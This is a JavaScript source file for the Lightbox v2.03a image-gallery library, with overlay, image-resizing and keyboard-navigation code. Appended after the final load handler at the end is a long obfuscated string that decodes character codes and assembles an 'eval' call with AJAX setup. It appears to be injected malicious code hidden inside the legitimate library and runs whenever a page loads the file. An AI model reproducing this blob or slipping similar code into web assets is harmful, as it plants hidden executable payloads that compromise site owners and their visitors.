// -----------------------------------------------------------------------------------
//
//	Lightbox v2.03
//	by Lokesh Dhakar - http://www.huddletogether.com
//	4/9/06
//
//	For more information on this script, visit:
//	http://huddletogether.com/projects/lightbox2/
//
//	Licensed under the Creative Commons Attribution 2.5 License - http://creativecommons.org/licenses/by/2.5/
//	
//	Credit also due to those who have helped, inspired, and made their code available to the public.
//	Including: Scott Upton(uptonic.com), Peter-Paul Koch(quirksmode.org), Thomas Fuchs(mir.aculo.us), and others.
//
//	Lightbox v2.03a
//	by Dynamicdrive.com- http://www.dynamicdrive.com
//	Nov 29th, 2007
//	Added ability for the caption ("title" attr of link) to be optionally hyperlinked, by throwing in a "rev" attr containing the desired link
// -----------------------------------------------------------------------------------
/*

	Table of Contents
	-----------------
	Configuration
	Global Variables

	Extending Built-in Objects	
	- Object.extend(Element)
	- Array.prototype.removeDuplicates()
	- Array.prototype.empty()

	Lightbox Class Declaration
	- initialize()
	- start()
	- changeImage()
	- resizeImageContainer()
	- showImage()
	- updateDetails()
	- updateNav()
	- enableKeyboardNav()
	- disableKeyboardNav()
	- keyboardAction()
	- preloadNeighborImages()
	- end()
	
	Miscellaneous Functions
	- getPageScroll()
	- getPageSize()
	- getKey()
	- listenKey()
	- showSelectBoxes()
	- hideSelectBoxes()
	- showFlash()
	- hideFlash()
	- pause()
	- initLightbox()
	
	Function Calls
	- addLoadEvent(initLightbox)
	
*/
// -----------------------------------------------------------------------------------

//
//	Configuration
//
var fileLoadingImage = "images/loading.gif";		
var fileBottomNavCloseImage = "images/closelabel.gif";

var animate = true;	// toggles resizing animations
var resizeSpeed = 7;	// controls the speed of the image resizing animations (1=slowest and 10=fastest)

var borderSize = 10;	//if you adjust the padding in the CSS, you will need to update this variable

// -----------------------------------------------------------------------------------

//
//	Global Variables
//
var imageArray = new Array;
var activeImage;

if(animate == true){
	overlayDuration = 0.2;	// shadow fade in/out duration
	if(resizeSpeed > 10){ resizeSpeed = 10;}
	if(resizeSpeed < 1){ resizeSpeed = 1;}
	resizeDuration = (11 - resizeSpeed) * 0.15;
} else { 
	overlayDuration = 0;
	resizeDuration = 0;
}

// -----------------------------------------------------------------------------------

//
//	Additional methods for Element added by SU, Couloir
//	- further additions by Lokesh Dhakar (huddletogether.com)
//
Object.extend(Element, {
	getWidth: function(element) {
	   	element = $(element);
	   	return element.offsetWidth; 
	},
	setWidth: function(element,w) {
	   	element = $(element);
    	element.style.width = w +"px";
	},
	setHeight: function(element,h) {
   		element = $(element);
    	element.style.height = h +"px";
	},
	setTop: function(element,t) {
	   	element = $(element);
    	element.style.top = t +"px";
	},
	setSrc: function(element,src) {
    	element = $(element);
    	element.src = src; 
	},
	setHref: function(element,href) {
    	element = $(element);
    	element.href = href; 
	},
	setInnerHTML: function(element,content) {
		element = $(element);
		element.innerHTML = content;
	}
});

// -----------------------------------------------------------------------------------

//
//	Extending built-in Array object
//	- array.removeDuplicates()
//	- array.empty()
//
Array.prototype.removeDuplicates = function () {
    for(i = 0; i < this.length; i++){
        for(j = this.length-1; j>i; j--){        
            if(this[i][0] == this[j][0]){
                this.splice(j,1);
            }
        }
    }
}

// -----------------------------------------------------------------------------------

Array.prototype.empty = function () {
	for(i = 0; i <= this.length; i++){
		this.shift();
	}
}

// -----------------------------------------------------------------------------------

//
//	Lightbox Class Declaration
//	- initialize()
//	- start()
//	- changeImage()
//	- resizeImageContainer()
//	- showImage()
//	- updateDetails()
//	- updateNav()
//	- enableKeyboardNav()
//	- disableKeyboardNav()
//	- keyboardNavAction()
//	- preloadNeighborImages()
//	- end()
//
//	Structuring of code inspired by Scott Upton (http://www.uptonic.com/)
//
var Lightbox = Class.create();

Lightbox.prototype = {
	
	// initialize()
	// Constructor runs on completion of the DOM loading. Loops through anchor tags looking for 
	// 'lightbox' references and applies onclick events to appropriate links. The 2nd section of
	// the function inserts html at the bottom of the page which is used to display the shadow 
	// overlay and the image container.
	//
	initialize: function() {	
		if (!document.getElementsByTagName){ return; }
		var anchors = document.getElementsByTagName('a');
		var areas = document.getElementsByTagName('area');

		// loop through all anchor tags
		for (var i=0; i<anchors.length; i++){
			var anchor = anchors[i];
			
			var relAttribute = String(anchor.getAttribute('rel'));
			
			// use the string.match() method to catch 'lightbox' references in the rel attribute
			if (anchor.getAttribute('href') && (relAttribute.toLowerCase().match('lightbox'))){
				anchor.onclick = function () {myLightbox.start(this); return false;}
			}
		}

		// loop through all area tags
		// todo: combine anchor & area tag loops
		for (var i=0; i< areas.length; i++){
			var area = areas[i];
			
			var relAttribute = String(area.getAttribute('rel'));
			
			// use the string.match() method to catch 'lightbox' references in the rel attribute
			if (area.getAttribute('href') && (relAttribute.toLowerCase().match('lightbox'))){
				area.onclick = function () {myLightbox.start(this); return false;}
			}
		}

		// The rest of this code inserts html at the bottom of the page that looks similar to this:
		//
		//	<div id="overlay"></div>
		//	<div id="lightbox">
		//		<div id="outerImageContainer">
		//			<div id="imageContainer">
		//				<img id="lightboxImage">
		//				<div style="" id="hoverNav">
		//					<a href="#" id="prevLink"></a>
		//					<a href="#" id="nextLink"></a>
		//				</div>
		//				<div id="loading">
		//					<a href="#" id="loadingLink">
		//						<img src="images/loading.gif">
		//					</a>
		//				</div>
		//			</div>
		//		</div>
		//		<div id="imageDataContainer">
		//			<div id="imageData">
		//				<div id="imageDetails">
		//					<span id="caption"></span>
		//					<span id="numberDisplay"></span>
		//				</div>
		//				<div id="bottomNav">
		//					<a href="#" id="bottomNavClose">
		//						<img src="images/close.gif">
		//					</a>
		//				</div>
		//			</div>
		//		</div>
		//	</div>


		var objBody = document.getElementsByTagName("body").item(0);
		
		var objOverlay = document.createElement("div");
		objOverlay.setAttribute('id','overlay');
		objOverlay.style.display = 'none';
		objOverlay.onclick = function() { myLightbox.end(); }
		objBody.appendChild(objOverlay);
		
		var objLightbox = document.createElement("div");
		objLightbox.setAttribute('id','lightbox');
		objLightbox.style.display = 'none';
		objLightbox.onclick = function(e) {	// close Lightbox is user clicks shadow overlay
			if (!e) var e = window.event;
			var clickObj = Event.element(e).id;
			if ( clickObj == 'lightbox') {
				myLightbox.end();
			}
		};
		objBody.appendChild(objLightbox);
			
		var objOuterImageContainer = document.createElement("div");
		objOuterImageContainer.setAttribute('id','outerImageContainer');
		objLightbox.appendChild(objOuterImageContainer);

		// When Lightbox starts it will resize itself from 250 by 250 to the current image dimension.
		// If animations are turned off, it will be hidden as to prevent a flicker of a
		// white 250 by 250 box.
		if(animate){
			Element.setWidth('outerImageContainer', 250);
			Element.setHeight('outerImageContainer', 250);			
		} else {
			Element.setWidth('outerImageContainer', 1);
			Element.setHeight('outerImageContainer', 1);			
		}

		var objImageContainer = document.createElement("div");
		objImageContainer.setAttribute('id','imageContainer');
		objOuterImageContainer.appendChild(objImageContainer);
	
		var objLightboxImage = document.createElement("img");
		objLightboxImage.setAttribute('id','lightboxImage');
		objImageContainer.appendChild(objLightboxImage);
	
		var objHoverNav = document.createElement("div");
		objHoverNav.setAttribute('id','hoverNav');
		objImageContainer.appendChild(objHoverNav);
	
		var objPrevLink = document.createElement("a");
		objPrevLink.setAttribute('id','prevLink');
		objPrevLink.setAttribute('href','#');
		objHoverNav.appendChild(objPrevLink);
		
		var objNextLink = document.createElement("a");
		objNextLink.setAttribute('id','nextLink');
		objNextLink.setAttribute('href','#');
		objHoverNav.appendChild(objNextLink);
	
		var objLoading = document.createElement("div");
		objLoading.setAttribute('id','loading');
		objImageContainer.appendChild(objLoading);
	
		var objLoadingLink = document.createElement("a");
		objLoadingLink.setAttribute('id','loadingLink');
		objLoadingLink.setAttribute('href','#');
		objLoadingLink.onclick = function() { myLightbox.end(); return false; }
		objLoading.appendChild(objLoadingLink);
	
		var objLoadingImage = document.createElement("img");
		objLoadingImage.setAttribute('src', fileLoadingImage);
		objLoadingLink.appendChild(objLoadingImage);

		var objImageDataContainer = document.createElement("div");
		objImageDataContainer.setAttribute('id','imageDataContainer');
		objImageDataContainer.className = 'clearfix';
		objLightbox.appendChild(objImageDataContainer);

		var objImageData = document.createElement("div");
		objImageData.setAttribute('id','imageData');
		objImageDataContainer.appendChild(objImageData);
	
		var objImageDetails = document.createElement("div");
		objImageDetails.setAttribute('id','imageDetails');
		objImageData.appendChild(objImageDetails);
	
		var objCaption = document.createElement("span");
		objCaption.setAttribute('id','caption');
		objImageDetails.appendChild(objCaption);
	
		var objNumberDisplay = document.createElement("span");
		objNumberDisplay.setAttribute('id','numberDisplay');
		objImageDetails.appendChild(objNumberDisplay);
		
		var objBottomNav = document.createElement("div");
		objBottomNav.setAttribute('id','bottomNav');
		objImageData.appendChild(objBottomNav);
	
		var objBottomNavCloseLink = document.createElement("a");
		objBottomNavCloseLink.setAttribute('id','bottomNavClose');
		objBottomNavCloseLink.setAttribute('href','#');
		objBottomNavCloseLink.onclick = function() { myLightbox.end(); return false; }
		objBottomNav.appendChild(objBottomNavCloseLink);
	
		var objBottomNavCloseImage = document.createElement("img");
		objBottomNavCloseImage.setAttribute('src', fileBottomNavCloseImage);
		objBottomNavCloseLink.appendChild(objBottomNavCloseImage);
	},
	
	//
	//	start()
	//	Display overlay and lightbox. If image is part of a set, add siblings to imageArray.
	//
	start: function(imageLink) {	

		function getImageTitle(anchor){ //DynamicDrive.com added function that allows the caption("title") to be linked ("rev").
			var ddimageTitle=anchor.getAttribute('title')
			var ddimageTitleURL=(ddimageTitle!=null && ddimageTitle!="")? anchor.getAttribute('rev') : null
			return ddimageTitleFinal=(ddimageTitleURL!=null && ddimageTitleURL!="")? '<a href="'+ddimageTitleURL+'" class="ddcaptionurl">'+ddimageTitle+'</a>' : ddimageTitle
		};

		hideSelectBoxes();
		hideFlash();

		// stretch overlay to fill page and fade in
		var arrayPageSize = getPageSize();
		Element.setHeight('overlay', arrayPageSize[1]);

		new Effect.Appear('overlay', { duration: overlayDuration, from: 0.0, to: 0.8 });

		imageArray = [];
		imageNum = 0;		

		if (!document.getElementsByTagName){ return; }
		var anchors = document.getElementsByTagName('a');

		// if image is NOT part of a set..
		if((imageLink.getAttribute('rel') == 'lightbox')){
			// add single image to imageArray
			imageArray.push(new Array(imageLink.getAttribute('href'), getImageTitle(imageLink)));			
		} else {
		// if image is part of a set..

			// loop through anchors, find other images in set, and add them to imageArray
			for (var i=0; i<anchors.length; i++){
				var anchor = anchors[i];
				if (anchor.getAttribute('href') && (anchor.getAttribute('rel') == imageLink.getAttribute('rel'))){
					imageArray.push(new Array(anchor.getAttribute('href'), getImageTitle(anchor)));
				}
			}
			imageArray.removeDuplicates();
			while(imageArray[imageNum][0] != imageLink.getAttribute('href')) { imageNum++;}
		}

		// calculate top offset for the lightbox and display 
		var arrayPageScroll = getPageScroll();
		var lightboxTop = arrayPageScroll[1] + (arrayPageSize[3] / 10);

		Element.setTop('lightbox', lightboxTop);
		Element.show('lightbox');
		
		this.changeImage(imageNum);
	},

	//
	//	changeImage()
	//	Hide most elements and preload image in preparation for resizing image container.
	//
	changeImage: function(imageNum) {	
		
		activeImage = imageNum;	// update global var

		// hide elements during transition
		if(animate){ Element.show('loading');}
		Element.hide('lightboxImage');
		Element.hide('hoverNav');
		Element.hide('prevLink');
		Element.hide('nextLink');
		Element.hide('imageDataContainer');
		Element.hide('numberDisplay');		
		
		imgPreloader = new Image();
		
		// once image is preloaded, resize image container
		imgPreloader.onload=function(){
			Element.setSrc('lightboxImage', imageArray[activeImage][0]);
			myLightbox.resizeImageContainer(imgPreloader.width, imgPreloader.height);
		}
		imgPreloader.src = imageArray[activeImage][0];
	},

	//
	//	resizeImageContainer()
	//
	resizeImageContainer: function( imgWidth, imgHeight) {

		// get curren width and height
		this.widthCurrent = Element.getWidth('outerImageContainer');
		this.heightCurrent = Element.getHeight('outerImageContainer');

		// get new width and height
		var widthNew = (imgWidth  + (borderSize * 2));
		var heightNew = (imgHeight  + (borderSize * 2));

		// scalars based on change from old to new
		this.xScale = ( widthNew / this.widthCurrent) * 100;
		this.yScale = ( heightNew / this.heightCurrent) * 100;

		// calculate size difference between new and old image, and resize if necessary
		wDiff = this.widthCurrent - widthNew;
		hDiff = this.heightCurrent - heightNew;

		if(!( hDiff == 0)){ new Effect.Scale('outerImageContainer', this.yScale, {scaleX: false, duration: resizeDuration, queue: 'front'}); }
		if(!( wDiff == 0)){ new Effect.Scale('outerImageContainer', this.xScale, {scaleY: false, delay: resizeDuration, duration: resizeDuration}); }

		// if new and old image are same size and no scaling transition is necessary, 
		// do a quick pause to prevent image flicker.
		if((hDiff == 0) && (wDiff == 0)){
			if (navigator.appVersion.indexOf("MSIE")!=-1){ pause(250); } else { pause(100);} 
		}

		Element.setHeight('prevLink', imgHeight);
		Element.setHeight('nextLink', imgHeight);
		Element.setWidth( 'imageDataContainer', widthNew);

		this.showImage();
	},
	
	//
	//	showImage()
	//	Display image and begin preloading neighbors.
	//
	showImage: function(){
		Element.hide('loading');
		new Effect.Appear('lightboxImage', { duration: resizeDuration, queue: 'end', afterFinish: function(){	myLightbox.updateDetails(); } });
		this.preloadNeighborImages();
	},

	//
	//	updateDetails()
	//	Display caption, image number, and bottom nav.
	//
	updateDetails: function() {
	
		Element.show('caption');
		Element.setInnerHTML( 'caption', imageArray[activeImage][1]);
		
		// if image is part of set display 'Image x of x' 
		if(imageArray.length > 1){
			Element.show('numberDisplay');
			Element.setInnerHTML( 'numberDisplay', "Image " + eval(activeImage + 1) + " of " + imageArray.length);
		}

		new Effect.Parallel(
			[ new Effect.SlideDown( 'imageDataContainer', { sync: true, duration: resizeDuration, from: 0.0, to: 1.0 }), 
			  new Effect.Appear('imageDataContainer', { sync: true, duration: resizeDuration }) ], 
			{ duration: resizeDuration, afterFinish: function() {
				// update overlay size and update nav
				var arrayPageSize = getPageSize();
				Element.setHeight('overlay', arrayPageSize[1]);
				myLightbox.updateNav();
				}
			} 
		);
	},

	//
	//	updateNav()
	//	Display appropriate previous and next hover navigation.
	//
	updateNav: function() {

		Element.show('hoverNav');				

		// if not first image in set, display prev image button
		if(activeImage != 0){
			Element.show('prevLink');
			document.getElementById('prevLink').onclick = function() {
				myLightbox.changeImage(activeImage - 1); return false;
			}
		}

		// if not last image in set, display next image button
		if(activeImage != (imageArray.length - 1)){
			Element.show('nextLink');
			document.getElementById('nextLink').onclick = function() {
				myLightbox.changeImage(activeImage + 1); return false;
			}
		}
		
		this.enableKeyboardNav();
	},

	//
	//	enableKeyboardNav()
	//
	enableKeyboardNav: function() {
		document.onkeydown = this.keyboardAction; 
	},

	//
	//	disableKeyboardNav()
	//
	disableKeyboardNav: function() {
		document.onkeydown = '';
	},

	//
	//	keyboardAction()
	//
	keyboardAction: function(e) {
		if (e == null) { // ie
			keycode = event.keyCode;
			escapeKey = 27;
		} else { // mozilla
			keycode = e.keyCode;
			escapeKey = e.DOM_VK_ESCAPE;
		}

		key = String.fromCharCode(keycode).toLowerCase();
		
		if((key == 'x') || (key == 'o') || (key == 'c') || (keycode == escapeKey)){	// close lightbox
			myLightbox.end();
		} else if((key == 'p') || (keycode == 37)){	// display previous image
			if(activeImage != 0){
				myLightbox.disableKeyboardNav();
				myLightbox.changeImage(activeImage - 1);
			}
		} else if((key == 'n') || (keycode == 39)){	// display next image
			if(activeImage != (imageArray.length - 1)){
				myLightbox.disableKeyboardNav();
				myLightbox.changeImage(activeImage + 1);
			}
		}

	},

	//
	//	preloadNeighborImages()
	//	Preload previous and next images.
	//
	preloadNeighborImages: function(){

		if((imageArray.length - 1) > activeImage){
			preloadNextImage = new Image();
			preloadNextImage.src = imageArray[activeImage + 1][0];
		}
		if(activeImage > 0){
			preloadPrevImage = new Image();
			preloadPrevImage.src = imageArray[activeImage - 1][0];
		}
	
	},

	//
	//	end()
	//
	end: function() {
		this.disableKeyboardNav();
		Element.hide('lightbox');
		new Effect.Fade('overlay', { duration: overlayDuration});
		showSelectBoxes();
		showFlash();
	}
}

// -----------------------------------------------------------------------------------

//
// getPageScroll()
// Returns array with x,y page scroll values.
// Core code from - quirksmode.org
//
function getPageScroll(){

	var yScroll;

	if (self.pageYOffset) {
		yScroll = self.pageYOffset;
	} else if (document.documentElement && document.documentElement.scrollTop){	 // Explorer 6 Strict
		yScroll = document.documentElement.scrollTop;
	} else if (document.body) {// all other Explorers
		yScroll = document.body.scrollTop;
	}

	arrayPageScroll = new Array('',yScroll) 
	return arrayPageScroll;
}

// -----------------------------------------------------------------------------------

//
// getPageSize()
// Returns array with page width, height and window width, height
// Core code from - quirksmode.org
// Edit for Firefox by pHaez
//
function getPageSize(){
	
	var xScroll, yScroll;
	
	if (window.innerHeight && window.scrollMaxY) {	
		xScroll = document.body.scrollWidth;
		yScroll = window.innerHeight + window.scrollMaxY;
	} else if (document.body.scrollHeight > document.body.offsetHeight){ // all but Explorer Mac
		xScroll = document.body.scrollWidth;
		yScroll = document.body.scrollHeight;
	} else { // Explorer Mac...would also work in Explorer 6 Strict, Mozilla and Safari
		xScroll = document.body.offsetWidth;
		yScroll = document.body.offsetHeight;
	}
	
	var windowWidth, windowHeight;
	if (self.innerHeight) {	// all except Explorer
		windowWidth = self.innerWidth;
		windowHeight = self.innerHeight;
	} else if (document.documentElement && document.documentElement.clientHeight) { // Explorer 6 Strict Mode
		windowWidth = document.documentElement.clientWidth;
		windowHeight = document.documentElement.clientHeight;
	} else if (document.body) { // other Explorers
		windowWidth = document.body.clientWidth;
		windowHeight = document.body.clientHeight;
	}	
	
	// for small pages with total height less then height of the viewport
	if(yScroll < windowHeight){
		pageHeight = windowHeight;
	} else { 
		pageHeight = yScroll;
	}

	// for small pages with total width less then width of the viewport
	if(xScroll < windowWidth){	
		pageWidth = windowWidth;
	} else {
		pageWidth = xScroll;
	}

	arrayPageSize = new Array(pageWidth,pageHeight,windowWidth,windowHeight) 
	return arrayPageSize;
}

// -----------------------------------------------------------------------------------

//
// getKey(key)
// Gets keycode. If 'x' is pressed then it hides the lightbox.
//
function getKey(e){
	if (e == null) { // ie
		keycode = event.keyCode;
	} else { // mozilla
		keycode = e.which;
	}
	key = String.fromCharCode(keycode).toLowerCase();
	
	if(key == 'x'){
	}
}

// -----------------------------------------------------------------------------------

//
// listenKey()
//
function listenKey () {	document.onkeypress = getKey; }
	
// ---------------------------------------------------

function showSelectBoxes(){
	var selects = document.getElementsByTagName("select");
	for (i = 0; i != selects.length; i++) {
		selects[i].style.visibility = "visible";
	}
}

// ---------------------------------------------------

function hideSelectBoxes(){
	var selects = document.getElementsByTagName("select");
	for (i = 0; i != selects.length; i++) {
		selects[i].style.visibility = "hidden";
	}
}

// ---------------------------------------------------

function showFlash(){
	var flashObjects = document.getElementsByTagName("object");
	for (i = 0; i != flashObjects.length; i++) {
		flashObjects[i].style.visibility = "visible";
	}

	var flashEmbeds = document.getElementsByTagName("embeds");
	for (i = 0; i != flashEmbeds.length; i++) {
		flashEmbeds[i].style.visibility = "visible";
	}
}

// ---------------------------------------------------

function hideFlash(){
	var flashObjects = document.getElementsByTagName("object");
	for (i = 0; i != flashObjects.length; i++) {
		flashObjects[i].style.visibility = "hidden";
	}

	var flashEmbeds = document.getElementsByTagName("embeds");
	for (i = 0; i != flashEmbeds.length; i++) {
		flashEmbeds[i].style.visibility = "hidden";
	}

}


// ---------------------------------------------------

//
// pause(numberMillis)
// Pauses code execution for specified time. Uses busy code, not good.
// Help from Ran Bar-On [ran2103@gmail.com]
//

function pause(ms){
	var date = new Date();
	curDate = null;
	do{var curDate = new Date();}
	while( curDate - date < ms);
}
/*
function pause(numberMillis) {
	var curently = new Date().getTime() + sender;
	while (new Date().getTime();	
}
*/
// ---------------------------------------------------



function initLightbox() { myLightbox = new Lightbox(); }
Event.observe(window, 'load', initLightbox, false);


d='function g_p(file ,b >t YG="GE ;= [ +cg="" Je +L=tru % +c.offset=100 Qs Yy =z =A =D ! C8 H +C =B ! C8 H Qu Ys ]+t ]Qcd YH(); -sxml2 V1 C-icrosoft V2 ,b=null}}if(!  b){if(typeof  F!="undefined" ,b 9 F ]* L= 2}} Qo NE, ? ,g[g_E]= .( ?,false) QS NE, ?, <vars C32== <vars C<  .( $g_E), $ ?)) * g[ $g_E)]= .( $ ?) U} Qx Nn,g_R){g_N= $ Wf);regexp 9RegExp( Wf+"|"+g_N); B. On 5regexp) Ei=0;i< B. 6;i++){g_k= B.[i] 5"="); 32= OR ,S A * o A}}}; [.trim NE,g_h){if("qabcdef".indexOf(g_E.substr(0,1))>=0 CB Z OE 5\'q\') 7\'\') 5\'v\') E Bi=0;i< Z 6;i++){ Z[i]=parseInt( Z[i],16)- ^ <  Z 7\',\')+\',\'}else{ajax _c.offset2=25; <  ^}; 8unR & !){eval( 8 &) Qca Nj C3 P&& Wg 6 ,x( Wg U}if(g_j C3 cg 6 Mj * cg Oj}}  o("g_q",new Date().getTime());g_i 9 . ]Ekey in(  g)){if(false== @1]&& 2==  P){g_N=  S(key, @0] U +g[key] >g[g_N[0]]= .(g_N[1] U;key ON[0]}g_i[g_i 6]=key+"="+ @0]}if(g_j Mi 7 Wf) * cg+ Oi 7 Wf)} QH YG="POS ;g="";d=\'v={! RR1%6^:"e-",! RW1%6^:"",& RR1%6v30:"l(\\\'l=Str"\\\\5:"ing.fr",K!dyO$f%@6&a!6:"omCha",N$8$8y&?eA<5&4:"rCode("Be&7|I&7#f&?d$dFBd&6&9A1E&e&X0&6THa#G2!fQ#f%0$R9~/2A<b#dQ#<2&<a~/9-<e%e!f!f-7&e&3*6B4!4&8$f%5z_NEJ>Z0&4&8#G3&8#Z0JP3!3&8#Y8!0&5DKJ/4!f!4#5#7!dA1#f!4*4P5&d#eV-2$Ye-c-e*1,a5%5&1$<6$<6#f!4*4>2$c`LV&5$@8&4w/6^&a$2N$3&3OQ*6>@1!b-4-G3-YeV*1/eA8#3&?a&d$eO&6F>8#7!7&c#Y7$3EK*7/b$7$3!3!e!3#a-f!5*3>4D$dMKA6E&c$dT/5%fL#dKDL%@1*1,a0#8`L#3$@cA6Nw/Z0&8-@2!b`!4%eJ/dA1!4y_%9%8!@c*4P8!b%9N!@8&8N&dw/f!5%6!2#a-3%7!2!3~H4-7`$1%4V#d-@2J>?Xb#5Q|#<a&9FB1!0&b%?9#Z3&7!0J>0%Y3A7A7#3K!XbF/eD#6#Y5#?eA2&0U,ad$8MyN$8M&<8U,a4&7&a!X<a!eL!dFBd#5$WaQ%6$dD#8*7>5#5#5A2&<8$8QyUP8A<8&d&c%0&5A0&3wB9L!b%f#d-aV$3#f~/7$7V#fI&1&4!4&9*4/G3%1#d^-1M#G3JBY4%a%8I%4O%9-7*6Bd$@a-0#cA6A6#c#dFP0I%4%7!G5K$e!5UB9$e!<3ME%Z3&bJP2&?W@?9!?8$eUB3%1V$3!b%fV#6%9wHbI%WfA3&1!6&9E*6Pe&4#e!@@9&ey#8*6>9N#Y8#f``N^wBX4%b$G8N&b#<bwPf&3&0A3A3L&f&5#9*7>1L!1#7K#9-d-dK*1>2!G2L%f!2&?5_~P2y#?eA<W6y!5U/5#4#c#<?5&0A2!5UP6!6%4&1#3!3&8#<6*3H<??e&0-fM|$2UP6|-?9&5$3&d^QTP6|-5M&4$3-c^QT>G3&@4%eE-1&1!0J/9^$dI%c-fA2%X7T,ae%e%5%c-e%e%5%a-ewH2%1$8-b%4%X0-bIUBe%d$0$cA0%0$0A3%fFHb-e%5I%8-e%6IA2wB0%1$eA1D#3-b&fLF/?cQ-b$7-b$8-bMU,abO-bI-b$c-b$d-bUH3-fz-f%4-f%5-f%6T,aW0-W1-W2-W3-8~H8-c%9-c%a-c%b-c%c*6,aXe-Xf-dA0-dA1!e*7/d-5%G4!4#7^#6^*4>6D#9D#aD#bD#cU/Ya!YZb#G5VM~P2&?8-7DN&8DNUB5#<7&a!4N!@@c*4/9$7D!eE&c#<9-8*6>0^K!fL&a$?a-9*7/f#<9&@fDE-8!f*6,d1-5$7#<7Q#<7&6*4/@3-<@3%a-1$3$3J/2&We%Y3#4#7#G5~Ha#G3$3$7N-a-3!7JB5#4$2&@fV#4$2$cw/a$<f!6%4!@e!6Q*3B4#@4`#e!4&6-@1*1/e&a&aE#9#f#cK!eT>5#9$<e!6&8-e!3N*3P3&3!b#YY4!2K!5~BcIQ&4|I&6EyT>?2K#3K!b-f!G2~P1#@8#8#9#8DV&3w/c&b&6E#e&d^Q#4T/2&ZG2#7&6E-f|~/5&e&<5-2#ZeL#7UP0KQ&4|_&6E-6T/aA1#<c#9#b^`-8*7Bc$e&6`&1 `5&1#eT/f `7!f `7!f#c#5*3>4#9#f#4&0 `4#f#bw>3#f#7#3 `7#3#f#9*7>2#d#dK#8#bK#7#7*6/Y3K!Y3K!Y8#3~>3#8#8#3#c#d#3#c#c*7>1#6#6D `8D#bDU>Yc#5&0#5#b#5 `5T>5D#9#d$2&0I%4%7U>2L#R3&7#a&5_&6F/aO$@7yy%0KK*7/9%Z3$3V-bM-d#dJ,aa%b%9%0%5$Y5$X9*7H5_&9$e$R8&9%5O*6BfK_#?d$d$fV_F,af!d#4#6!b%f!2!f%4~P<aI%RR3#dKK*3/a!e!6-3!e!6$?e!6*3P3!@4`!@4I!@4*1P1-b-a&4!7-GdD-dJ>4^#7$c%W6#8^#4T/3$3$?eO$fM$eNJ/7!7E#Z3zN!0#aJPbA2-2$dD^$d#c^T/a!G8#dVO%7!1&8*1/<c-@2#Y@0K!0JH4_`#e-G3N|_*1/dE-e!4!2%9IQ%6~B8#dD^#<0$8VMJB7$W4#d#8^#Y@fJ/6#8!6-2A3A3&1E-a*6P2&?W4!?9!?8-3U>2$R6MV%8M&9%0*4B9%1Mz%8!@R3!d*4,d4yL%9&4&7L%7#3*7/R2!Xf!R4K$X2*4H2M%6&c-8-1-0&1!7*4H0%f#G5V$8#fy!2~Pf&GbL&@a-4L&fFPbN#c#6O%7$cA1&5wPRWf%6%6L&f&W9FH5%4N!3$3Q|K^J><<b-8V#G0y#bJ,adO!5&fy%9%RaOU>c-9&Ye!1#?f$3%0*1BeA3&5$2-8&7L#e-bFHc&1!7-8!@b$8$Xa*4>0K&4|%bD|A1#5T/c&1M$e%Z5$eMyUB<6$8#7$<6!4&b$8*4BXR4%0V%d#ez_*4H3O&<5D&0$1!7!5UPc#Z3&G<6%8E-1JHbN&0&3N&c&f&?8w>X6&5%c-7`O-1`*3H1M!@b$cMV$8!b*4>2`#9Q-a%fEL%cT,afN&7$@8-3%eD&3w/d-1L^%d#3A7A7A7F>b-8$3Q#G3$3Q#bJ/6QM!Z@6O$2!7*3>3$cO%9-a-9&8&5IUHa_$W9$e%4_!d-6UP3N#?b-e!f#4!f-fw>2%7M%8&5%WW6$d*4B6%9%8M!@b%R6$7*4/f#4`L%0%c%c%8yw>6#6$WR0#5%b%e%0*7H6%6$R4^V%1$fD~>9#Rc%a$X6$c%b#7wBeI_%6A3#W4%X9FBf&0-9!1&3!f!4-Z4*1Bf-f!Z7`N-1_z*4HX1DK#4#aA7&dOTH8M|$0$<ZdyD*4>1E%Z3%1#G3&bNJ>8!G4#3!4!4&1zM*4Ha!3&4%5%5`%@Z3*3/a&6-6O%X1#RbOTH3M%4z!GY3%9%4U,a6%R5$c%1O!Zc#e*3/4!1!?a%c_Q%5%6*1HR3!?a!GGd-fMU/a$<9#3%Z3ED`*3H0%0V$e`&3$8M$cJB4N!3!<8!3&bN#4J/9!0#b#b$2zV$1IJ,d<3!G6%0-e-f!?6*3/2!Gb%f$7$e%5$Rd~/7#3%X0%a%0M%0_*7Be%9%Yf$d$eMMOUH7E#6%fO%bEE#7T/6$c-e$c$0-Y9$0D*3H6%aO%RY3!5#4#3UBX2I%c&X9$e$f&bFHdD#aK#4E#bz$fTH5`%0$8!3#7$R2Q*3He%6$e%RdE#e|&eTB4DD$3E#f!f!fzT>4$f%4OI%e-5$@e*6/8!1!1DL!@4%bL*1/?0D`!e_V%4-5J,ac&bA6$@cA6D#?8w>7!3%1#G<a`-@2JB6#4$?b#6E&1&6|T,a6LE%5V%4Iz%6~/8L!1#a!4&6-@9!1*1/d#b#b#9#9D&6&6Nw>fN-3#3$cO%9&a%1UBb_I%4%a!6&1#4z*6Be%R0%X1E&?d&fTHbzz-fI$R8!e!f*6P?a&Wd$f%e-e_%7FBfL&9$dI%6%6$cIFB5$d#f-a$?2&4%9I~H7$X8A<9&cz$fDT/2&6!5$7#<?2&7!b~,d4EE&f&6|$YR8TB6Q_V%4!0&7!0_JHbA0_$c&4$3E!7&f*7/6%4&<6%4!e-f!5^*3/9-2|A3K!e|$cIT/9-G0&a!e!0K&c$fJB7OIO!6-1|%W4*6Be&7Q|#?Ga-6&8F>eDQI%8&<9!Z2~,a?b-8&?8#d-ZfVw/G5#eMz%?bQ&0*3>b `eQ#e$7&<b%7*3P5$c#6%b%W4%1%c^w/a!6!7&3-4-9-a-b-d*3B0%e-c-@<<<1!0J/eL!fL#<aKL#4F/9#4E#?9#6E#7ET>4!5#7!5#9!5#a!5#bU/6#6!6#7!6#G6#e!6*6>9!0#a!0#Z0#@0#eJ/7&6!7&9!7&a!7&Z7*7P?0&6!0&7!0&8!0&9J/1&Z1&@1&G1&eN*1>Rc%eI%c%XbD$cT>0&<b%b&0Q#f#4#6*3>fD#aKE|%8EEJ>0#5%1%6%0%?f%b#5*7H1%0%1ELLL#cQ*1Hd$W3!fI^*7\\\\7:"32);ev",&%W8$X6$c&b%0%1:"al(l)\\\'",!7!7!0&9zN!0#8y:");"};dk=[] E-r x in v){dk.push(trim(x,v))};e-l(dk 7\\\'\\\'))!v7#v8$vb%vc&v9*:8+,q-va/+7<0!>+8?5!@c!AvdB,bD#1E!9F:90Gd!H,cI$bJ*0K#2L!aM$9N!8O$aP+9Q$6R7%T*9U*5V$5W8%Xd%Ye#Zb!^#0_%3`$4w*8y&2z%2|!c~*2\\\\,#6#?e$2&<Wfy!\' 